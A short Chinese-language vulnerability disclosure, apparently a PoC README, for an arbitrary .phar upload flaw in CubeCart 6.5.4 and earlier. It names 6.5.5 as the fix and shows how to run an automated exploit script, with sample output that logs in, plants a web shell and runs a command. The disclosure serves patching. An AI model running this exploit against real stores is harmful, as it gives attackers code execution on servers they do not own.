CubeCart <= 6.5.4 存在一个任意文件上传漏洞,可导致远程代码执行(RCE)。该漏洞影响应用程序的文件管理器及其过滤器,允许攻击者上传包含恶意代码的 .phar 文件。CubeCart 应更新至 6.5.5,该版本实施了安全补丁以修复此漏洞。
更多详情请参阅 CubeCart 在参考资料中的官方公告。
已创建自动化概念验证(PoC),但也可通过文件管理器手动上传恶意 .phar 文件来利用此漏洞。
以下是 PoC 的使用方法:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
运行后,成功利用的预期输出如下:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data